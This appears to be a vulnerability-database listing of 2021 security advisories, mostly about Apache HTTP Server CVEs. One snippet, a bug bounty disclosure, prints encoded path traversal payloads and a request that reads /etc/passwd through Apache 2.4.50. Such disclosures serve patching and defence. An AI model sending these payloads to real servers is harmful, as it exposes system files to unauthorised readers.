[SECURITY] Fedora 34 Update: rust-tiny_http0.6-0.6.4-1.fc34

Low level HTTP server library...

[SECURITY] Fedora 34 Update: rust-tiny_http-0.8.2-1.fc34

Low level HTTP server library...

Exploit for Uncontrolled Resource Consumption in Siemens 6Bk1602-0Aa12-0Tp0_Firmware

Log4j2 Replay Notes, for learning purposes only Reference:...

[ASA-202112-12] grafana-agent: information disclosure

Arch Linux Security Advisory ASA-202112-12 ========================================== Severity: High Date : 2021-12-11 CVE-ID : CVE-2021-41090 Package : grafana-agent Type : information disclosure Remote : Yes Link : https://security.archlinux.org/AVG-2614 Summary ======= The package grafana-agen...

Cisco Releases Security Advisory for Multiple Products Affected by Apache HTTP Server Vulnerabilities

Cisco has released a security advisory to address Cisco products affected by multiple vulnerabilities in Apache HTTP Server 2.4.48 and earlier releases. An unauthenticated remote attacker could exploit this vulnerability to take control of an affected system. CISA encourages users and...

Security Bulletin: Multiple vulnerabilities affect IBM HTTP Server (powered by Apache) for i

Summary IBM HTTP Server powered by Apache for i is vulnerable to the issues described in the vulnerability details section. IBM i has addressed the applicable CVEs in the Apache HTTP Server implementation. Vulnerability Details CVEID: CVE-2021-40438 DESCRIPTION: Apache HTTP Server is vulnerable t...

Why Everyone Needs to Take the Latest CISA Directive Seriously

Government agencies publish notices and directives all the time. Usually, these are only relevant to government departments, which means that nobody else really pays attention. It's easy to see why you would assume that a directive from CISA just doesn't relate to your organization. But, in the...

IBM HTTP Server Installed (Windows)

Binary data ibmhttpdwininstalled.nbin...

Active Exploitation of Apache HTTP Server CVE-2021-40438

CVE | Vendor Advisory | AttackerKB | IVM Content | Patching Urgency | Last Update ---|---|---|---|---|--- CVE-2021-40438 | Apache Advisory | AttackerKB | 09/16/2021 multiple | ASAP | December 1, 2021 14:00 ET On September 16, 2021, Apache released version 2.4.49 of HTTP Server, which included a f...

Security Bulletin: Multiple vulnerabilities have been identified in WebSphere Application Server shipped with Cloud Pak System

Summary WebSphere Application Server is shipped as a component of IBM Cloud Pak System. Vulnerabilities have been identified in WebSphere Application Server. Information about security vulnerabilities affecting WebSphere Application Server have been published in security bulletins. Vulnerability...

Multiple Vulnerabilities in Apache HTTP Server Affecting Cisco Products: November 2021

On September 16, 2021, the Apache Software Foundation disclosed five vulnerabilities affecting the Apache HTTP Server httpd 2.4.48 and earlier releases. For a description of these vulnerabilities, see the Apache HTTP Server 2.4.49 section...

vulhub1

This is a repository for a project called Vulhub, which appears to be a collection of vulnerable systems and applications for testing and learning purposes. The repository contains various files and directories, including: 1. .gitattributes: A file that specifies which files should be ignored by...

Internet Bug Bounty: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.50

Hello Apache team, @fms and myself were able to bypass the latest patch for CVE 2021-41773 in the Apache 2.4.50. These are the payloads: 1 %%32%65%%32%65 2 .%%32%65 3 .%%32e 4 .%2%65 PoC Path Traversal GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1...

Security Bulletin: Vulnerabilities in IBM HTTP Server affect IBM Cloud Orchestrator and IBM Cloud Orchestrator Enterprise

Summary There are vulnerabilities in IBM HTTP Server used by IBM WebSphere Application Server. IBM WebSphere Application Server is shipped with IBM Cloud Orchestrator and IBM Cloud Orchestrator Enterprise. These issues were addressed by IBM WebSphere Application Server. Vulnerability Details Refe...

Apache HTTP Server 2.4.49 & 2.4.50 Path Traversal (CVE-2021-42013)

Binary data apache2450pathtraversal.nbin...

EulerOS Virtualization 2.9.1 : httpd (EulerOS-SA-2021-2746)

According to the versions of the httpd packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities : - Apache HTTP Server versions 2.4.0 to 2.4.46 A specially crafted Digest nonce can cause a stack overflow in modauthdigest. There is...

EulerOS Virtualization 2.9.0 : httpd (EulerOS-SA-2021-2779)

According to the versions of the httpd packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities : - Apache HTTP Server versions 2.4.0 to 2.4.46 A specially crafted Digest nonce can cause a stack overflow in modauthdigest. There is...

Oracle Linux 8 : httpd:2.4 (ELSA-2021-4257)

The remote Oracle Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the ELSA-2021-4257 advisory. - Add checks on the configured UDS path Orabug: 33412270CVE-2021-40438 - Resolves: 1972500 - CVE-2021-30641 httpd:2.4/httpd: MergeSlashes regression -...

Huawei EulerOS: Security Advisory for httpd (EulerOS-SA-2021-2779)

The remote host is missing an update for the Huawei EulerOS SPDX-FileCopyrightText: 2021 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

httpd:2.4 security, bug fix, and enhancement update

httpd 2.4.37-41.0.1 - Add checks on the configured UDS path Orabug: 33412270CVE-2021-40438 - Set vstring per ORACLESUPPORTPRODUCT Orabug: 29892262 - Replace index.html with Oracles index page oracleindex.html 2.4.37-41 - Resolves: 1680111 - httpd sends reply to HTTPS GET using two TLS records -...